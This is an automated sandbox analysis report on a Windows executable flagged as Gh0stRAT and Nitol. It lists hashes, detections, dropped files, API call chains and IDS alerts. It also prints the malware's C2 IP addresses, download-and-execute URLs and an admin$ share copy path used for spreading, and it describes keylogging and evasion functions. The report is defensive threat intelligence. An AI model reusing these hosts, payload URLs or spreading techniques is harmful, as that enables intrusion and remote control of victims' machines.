Windows Analysis Report
G3izWAY3Fa.exe

Overview

General Information

Sample name: G3izWAY3Fa.exe (renamed because the original name is a hash value)
Original sample name: 118F7F61B6AFB1DA5E94EA1740222C73.exe
Analysis ID: 1579781
MD5: 118f7f61b6afb1da5e94ea1740222c73
SHA1: 5a0d66ec18cdb3812bad259999cf64d051cefa8b
SHA256: aaf88339c23080ffd423da3b03a229d220b55c5e007c1f413fbd3633c48aad44
Tags: exe, Gh0stRAT, user-abuse_ch

Detection

GhostRat, Nitol
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Suricata IDS alerts for network traffic
Yara detected GhostRat
Yara detected Nitol
AI detected suspicious sample
Checks if browser processes are running
Contains functionality to detect virtual machines
Contains functionality to capture and log keystrokes
Contains functionality to detect sleep reduction / modifications
Contains functionality to detect virtual machines (IN, VMware)
Contains functionality to enumerate network shares of other devices
Deletes itself after installation
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after checking mutex)
Found stalling execution ending in API Sleep call
Machine Learning detection for dropped file
Sigma detected: Files With System Process Name In Unsuspected Locations
AV process strings found (often used to terminate AV products)
Contains functionality to read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to communicate with device drivers
Contains functionality to delete services
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates processes with suspicious names
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries keyboard layouts
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Too many similar processes found
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection

Source: G3izWAY3Fa.exe Avira: detected
Source: C:\Windows\SysWOW64\033726\svchost.exe Avira: detection malicious, Label: BDS/Zegost.birna
Source: C:\Windows\SysWOW64\034031\svchost.exe Avira: detection malicious, Label: BDS/Zegost.birna
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe Avira: detection malicious, Label: BDS/Zegost.birna
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe Avira: detection malicious, Label: BDS/Zegost.birna
Source: C:\Windows\SysWOW64\033726\RCX773C.tmp Avira: detection malicious, Label: BDS/Zegost.birna
Source: C:\Windows\Temp\server.exe Avira: detection malicious, Label: BDS/Zegost.birna
Source: C:\Windows\Temp\v5.exe Avira: detection malicious, Label: TR/Staser.apzjs
Source: C:\Windows\SysWOW64\034031\RCX8B31.tmp Avira: detection malicious, Label: BDS/Zegost.birna
Source: C:\Windows\SysWOW64\033726\svchost.exe ReversingLabs: Detection: 95%
Source: C:\Windows\Temp\server.exe ReversingLabs: Detection: 95%
Source: C:\Windows\Temp\v5.exe ReversingLabs: Detection: 100%
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe ReversingLabs: Detection: 95%
Source: G3izWAY3Fa.exe Virustotal: Detection: 70%
Source: G3izWAY3Fa.exe ReversingLabs: Detection: 86%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.1% probability
Source: C:\Windows\SysWOW64\033726\svchost.exe Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\034031\svchost.exe Joe Sandbox ML: detected
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe Joe Sandbox ML: detected
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\033726\RCX773C.tmp Joe Sandbox ML: detected
Source: C:\Windows\Temp\server.exe Joe Sandbox ML: detected
Source: C:\Windows\Temp\v5.exe Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\034031\RCX8B31.tmp Joe Sandbox ML: detected
Source: G3izWAY3Fa.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Binary string: f:\SystemTool Eng 19\SystemTool Eng 16\SystemTool Eng 52\SystemTool\Release\SystemTool.pdb source: G3izWAY3Fa.exe, 00000000.00000002.1327850381.0000000002851000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmp, .exe, 00000005.00000000.1324754830.0000000000465000.00000002.00000001.01000000.00000007.sdmp, .exe.0.dr
Source: Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdbEG source: .exe, 00000005.00000002.2705569852.000000000249E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: .exe, 00000005.00000002.2705409189.0000000002340000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdb source: .exe, 00000005.00000002.2705569852.000000000249E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mp\\Symbols\winload_prod.pdb source: .exe, 00000005.00000002.2705409189.0000000002340000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb4 source: .exe, 00000005.00000002.2705409189.0000000002340000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\ntkrnlmp.pdb source: .exe, 00000005.00000002.2705674625.00000000024E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: -00c04fd929dbmp\\Symbols\winload_prod.pdbrord32_super_sbx\Adobe\Acrob source: .exe, 00000005.00000002.2705409189.0000000002340000.00000004.00000020.00020000.00000000.sdmp

Spreading

Source: C:\Windows\Temp\v5.exe Code function: 4_2_00402AD0 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,memset,lstrcmp,sprintf,sprintf,sprintf,WNetAddConnection2A,Sleep,memset,sprintf,CopyFileA,memset,sprintf,memset,sprintf,memset,sprintf,memset,sprintf,GetLocalTime,memset,sprintf,WinExec,Sleep, \\%s\admin$\g1fd.exe 4_2_00402AD0
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Code function: 0_2_00405302 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_00405302
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Code function: 0_2_0040263E FindFirstFileA, 0_2_0040263E
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Code function: 0_2_00405CD8 FindFirstFileA,FindClose, 0_2_00405CD8
Source: C:\Windows\Temp\server.exe Code function: 3_2_10001A20 GetSystemDirectoryA,wsprintfA,wsprintfA,CreateFileA,CloseHandle,Sleep,Sleep,FindFirstFileA,GetCurrentDirectoryA,strstr,Sleep,GetVersionExA,GetSystemDefaultLCID,Sleep,Sleep,GetLocalTime,wsprintfA,_mkdir,Sleep,GetModuleFileNameA,CopyFileA,wsprintfA,wsprintfA,BeginUpdateResourceA,UpdateResourceA,EndUpdateResourceW,CloseHandle,Sleep,ShellExecuteA,Sleep,GetWindowsDirectoryA,wsprintfA,wsprintfA,_mkdir,_mkdir,_mkdir,_mkdir,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA, 3_2_10001A20
Source: C:\Windows\Temp\server.exe Code function: 3_2_100014B0 GetSystemDirectoryA,FindFirstFileA,CreateFileA,ReadFile,wsprintfA,wsprintfA,CloseHandle,wsprintfA,lstrlen,lstrlen,wsprintfA,lstrlen, 3_2_100014B0
Source: C:\Windows\Temp\server.exe Code function: 3_2_10008B50 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,??2@YAPAXI@Z,??3@YAXPAX@Z,wsprintfA,FindNextFileA,FindClose, 3_2_10008B50
Source: C:\Windows\Temp\server.exe Code function: 3_2_10008520 LocalAlloc,wsprintfA,FindFirstFileA,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose, 3_2_10008520
Source: C:\Windows\Temp\server.exe Code function: 3_2_10008E40 FindFirstFileA,FindClose,FindClose, 3_2_10008E40
Source: C:\Windows\Temp\server.exe Code function: 3_2_100086F0 wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 3_2_100086F0
Source: C:\Windows\Temp\server.exe Code function: 3_2_10008F00 FindFirstFileA,FindClose,CreateFileA,CloseHandle, 3_2_10008F00
Source: C:\Windows\Temp\ .exe Code function: 5_2_0045B051 __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA, 5_2_0045B051
Source: C:\Windows\Temp\ .exe Code function: 5_2_00405260 FindFirstFileA,GetFileAttributesA,SetFileAttributesA,RemoveDirectoryA,DeleteFileA,FindNextFileA,FindClose, 5_2_00405260
Source: C:\Windows\Temp\ .exe Code function: 5_2_00439D40 #17,__time32,FindFirstFileA,DeleteFileA, 5_2_00439D40
Source: C:\Windows\SysWOW64\033726\svchost.exe Code function: 8_2_10001A20 GetSystemDirectoryA,wsprintfA,wsprintfA,CreateFileA,CloseHandle,Sleep,Sleep,FindFirstFileA,GetCurrentDirectoryA,strstr,Sleep,GetVersionExA,GetSystemDefaultLCID,Sleep,Sleep,GetLocalTime,wsprintfA,_mkdir,Sleep,GetModuleFileNameA,CopyFileA,wsprintfA,wsprintfA,BeginUpdateResourceA,UpdateResourceA,EndUpdateResourceW,CloseHandle,Sleep,ShellExecuteA,Sleep,GetWindowsDirectoryA,wsprintfA,wsprintfA,_mkdir,_mkdir,_mkdir,_mkdir,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA, 8_2_10001A20
Source: C:\Windows\SysWOW64\033726\svchost.exe Code function: 8_2_10008B50 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,??2@YAPAXI@Z,??3@YAXPAX@Z,wsprintfA,FindNextFileA,FindClose, 8_2_10008B50
Source: C:\Windows\SysWOW64\033726\svchost.exe Code function: 8_2_100014B0 GetSystemDirectoryA,FindFirstFileA,CreateFileA,ReadFile,wsprintfA,wsprintfA,CloseHandle,wsprintfA,lstrlen,lstrlen,wsprintfA,lstrlen, 8_2_100014B0
Source: C:\Windows\SysWOW64\033726\svchost.exe Code function: 8_2_10008520 LocalAlloc,wsprintfA,FindFirstFileA,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose, 8_2_10008520
Source: C:\Windows\SysWOW64\033726\svchost.exe Code function: 8_2_10008E40 FindFirstFileA,FindClose,FindClose, 8_2_10008E40
Source: C:\Windows\SysWOW64\033726\svchost.exe Code function: 8_2_100086F0 wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 8_2_100086F0
Source: C:\Windows\SysWOW64\033726\svchost.exe Code function: 8_2_10008F00 FindFirstFileA,FindClose,CreateFileA,CloseHandle, 8_2_10008F00
Source: C:\Windows\Temp\server.exe Code function: 3_2_1000AA30 wsprintfA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,wsprintfA,GetTickCount,wsprintfA,GetComputerNameA,GetUserNameA,wsprintfA,GetLogicalDriveStringsA,lstrlen,GetVolumeInformationA,SHGetFileInfo,lstrlen,lstrlen,GetDiskFreeSpaceExA,lstrlen,wsprintfA,wsprintfA,GlobalMemoryStatusEx,GlobalMemoryStatusEx,wsprintfA,GlobalMemoryStatusEx,wsprintfA,wsprintfA,lstrlen,wsprintfA,_strrev,_strrev,_strrev,_strrev,wsprintfA,wsprintfA, 3_2_1000AA30
Source: C:\Windows\Temp\ .exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows
Source: C:\Windows\Temp\ .exe File opened: C:\Users\user\AppData\Local
Source: C:\Windows\Temp\ .exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\History\desktop.ini
Source: C:\Windows\Temp\ .exe File opened: C:\Users\user\AppData
Source: C:\Windows\Temp\ .exe File opened: C:\Users\user\AppData\Local\Microsoft
Source: C:\Windows\Temp\ .exe File opened: C:\Users\user

Networking

Source: Network traffic Suricata IDS: 2013214 - Severity 1 - ET MALWARE Gh0st Remote Access Trojan Encrypted Session To CnC Server : 192.168.2.9:49707 -> 120.48.34.233:8000
Source: Network traffic Suricata IDS: 2016922 - Severity 1 - ET MALWARE Backdoor family PCRat/Gh0st CnC traffic : 192.168.2.9:49707 -> 120.48.34.233:8000
Source: Network traffic Suricata IDS: 2048478 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Gh0stRat Keep-Alive : 120.48.34.233:8000 -> 192.168.2.9:49707
Source: Network traffic Suricata IDS: 2808814 - Severity 1 - ETPRO MALWARE Backdoor family PCRat/Gh0st CnC Response : 120.48.34.233:8000 -> 192.168.2.9:49707
Source: Network traffic Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49720 -> 8.7.198.46:8090
Source: Network traffic Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49713 -> 120.48.34.233:8080
Source: Network traffic Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49774 -> 8.7.198.46:8090
Source: Network traffic Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49767 -> 120.48.34.233:8080
Source: Network traffic Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49814 -> 120.48.34.233:8080
Source: Network traffic Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49820 -> 8.7.198.46:8090
Source: Network traffic Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49857 -> 120.48.34.233:8080
Source: Network traffic Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49865 -> 46.82.174.69:8090
Source: Network traffic Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49901 -> 120.48.34.233:8080
Source: Network traffic Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49912 -> 46.82.174.69:8090
Source: Network traffic Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49945 -> 120.48.34.233:8080
Source: Network traffic Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49956 -> 46.82.174.69:8090
Source: Network traffic Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49989 -> 120.48.34.233:8080
Source: Network traffic Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49767 -> 120.48.34.233:8080
Source: Network traffic Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49857 -> 120.48.34.233:8080
Source: Network traffic Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49901 -> 120.48.34.233:8080
Source: Network traffic Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49956 -> 46.82.174.69:8090
Source: Network traffic Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49865 -> 46.82.174.69:8090
Source: Network traffic Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49713 -> 120.48.34.233:8080
Source: Network traffic Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49820 -> 8.7.198.46:8090
Source: Network traffic Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49989 -> 120.48.34.233:8080
Source: Network traffic Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49912 -> 46.82.174.69:8090
Source: Network traffic Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49720 -> 8.7.198.46:8090
Source: Network traffic Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49774 -> 8.7.198.46:8090
Source: Network traffic Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49945 -> 120.48.34.233:8080
Source: Network traffic Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49814 -> 120.48.34.233:8080
Source: C:\Windows\Temp\server.exe Code function: 3_2_1000B6F0 Sleep,wsprintfA,GetTickCount,GetTickCount,wsprintfA,URLDownloadToFileA,GetTempPathA,fopen,fscanf,fscanf,GetTickCount,wsprintfA,GetTickCount,wsprintfA,URLDownloadToFileA,ShellExecuteA,fscanf,fclose,DeleteFileA,Sleep, 3_2_1000B6F0
Source: global traffic TCP traffic: 192.168.2.9:49707 -> 120.48.34.233:8000
Source: global traffic TCP traffic: 192.168.2.9:49720 -> 8.7.198.46:8090
Source: global traffic TCP traffic: 192.168.2.9:49865 -> 46.82.174.69:8090
Source: Joe Sandbox View ASN Name: CHINANET-BACKBONENo31Jin-rongStreetCN
Source: Joe Sandbox View ASN Name: SPRINGSUS
Source: Joe Sandbox View ASN Name: DTAGInternetserviceprovideroperationsDE
Source: unknown TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\Temp\v5.exe Code function: 2_2_004036C6 select,__WSAFDIsSet,recv, 2_2_004036C6
Source: global traffic DNS traffic detected: DNS query: chinagov.8800.org
Source: global traffic DNS traffic detected: DNS query: www.wk1888.com
Source: global traffic DNS traffic detected: DNS query: www.af0575.com
Source: global traffic DNS traffic detected: DNS query: www.fz0575.com
Source: v5.exe, 00000004.00000002.2594829199.0000000000678000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.168.2.1
Source: v5.exe, 00000004.00000003.2558799404.0000000000690000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2558799404.00000000006B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.168.2.1/
Source: v5.exe, 00000004.00000003.1494703239.00000000006B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.168.2.1/1
Source: v5.exe, 00000004.00000003.2237287822.0000000000690000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2013456576.0000000000691000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.168.2.1/VZ
Source: v5.exe, 00000004.00000003.1494703239.00000000006A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.168.2.1/b6
Source: v5.exe, 00000004.00000002.2594829199.0000000000678000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.168.2.1/h
Source: v5.exe, 00000004.00000003.2013456576.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2237287822.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000002.2594829199.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2558799404.00000000006C3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.168.2.1:80/
Source: v5.exe, 00000004.00000003.2237287822.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000002.2594829199.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2558799404.00000000006C3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.168.2.1:80/4
Source: v5.exe, 00000004.00000003.1561640538.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1494703239.00000000006A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.168.2.1:80/6to4
Source: v5.exe, 00000004.00000003.2237287822.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000002.2594829199.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2558799404.00000000006C3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.168.2.1:80/_
Source: v5.exe, 00000004.00000002.2594829199.00000000006C3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.168.2.1:80/~
Source: G3izWAY3Fa.exe String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: G3izWAY3Fa.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.af0575.com:2011/1.exe
Source: server.exe, 00000003.00000002.2683900710.0000000000708000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.af0575.com:2011/1.exe8
Source: svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.af0575.com:2011/1.exeb
Source: svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.af0575.com:2011/1.exee
Source: svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.af0575.com:2011/1.exee3
Source: server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.af0575.com:2011/1.exejlt
Source: svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.af0575.com:2011/1.exer
Source: server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.af0575.com:2011/1.exe~l
Source: server.exe, 00000003.00000002.2683900710.000000000067D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2631462911.0000000000812000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fz0575.com:2011/1.exe
Source: server.exe, 00000003.00000002.2683900710.000000000067D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fz0575.com:2011/1.exe-
Source: server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fz0575.com:2011/1.exeNoP
Source: server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fz0575.com:2011/1.exelo~
Source: server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fz0575.com:2011/1.exepoj
Source: svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fz0575.com:2011/1.exer
Source: server.exe, 00000003.00000002.2683900710.0000000000708000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fz0575.com:2011/1.exew
Source: server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.wk1888.com/
Source: svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.wk1888.com:2011/1.exe
Source: svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.wk1888.com:2011/1.exer
Source: server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.wk1888.com:2011/1.exetlV
Source: .exe, 00000005.00000002.2705462292.000000000234B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGY
Source: .exe, 00000005.00000002.2705462292.000000000234B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: server.exe, 00000003.00000002.2683900710.00000000006F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2659797363.0000000000880000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: .exe, 00000005.00000002.2705732452.0000000002550000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000005.00000002.2682490023.00000000006B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: .exe, 00000005.00000002.2682490023.000000000069D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033BKSLMEM
Source: .exe, 00000005.00000002.2682490023.000000000069D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033FYMLMEM
Source: .exe, 00000005.00000002.2705732452.0000000002550000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: .exe, 00000005.00000002.2682490023.000000000071F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3ez

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\Temp\server.exe Code function: <BackSpace> 3_2_10009A00
Source: C:\Windows\Temp\server.exe Code function: <Enter> 3_2_10009A00
Source: C:\Windows\SysWOW64\033726\svchost.exe Code function: <BackSpace> 8_2_10009A00
Source: C:\Windows\SysWOW64\033726\svchost.exe Code function: <Enter> 8_2_10009A00
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Code function: 0_2_00404EB9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00404EB9
Source: C:\Windows\Temp\server.exe Code function: 3_2_1000FA20 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard, 3_2_1000FA20
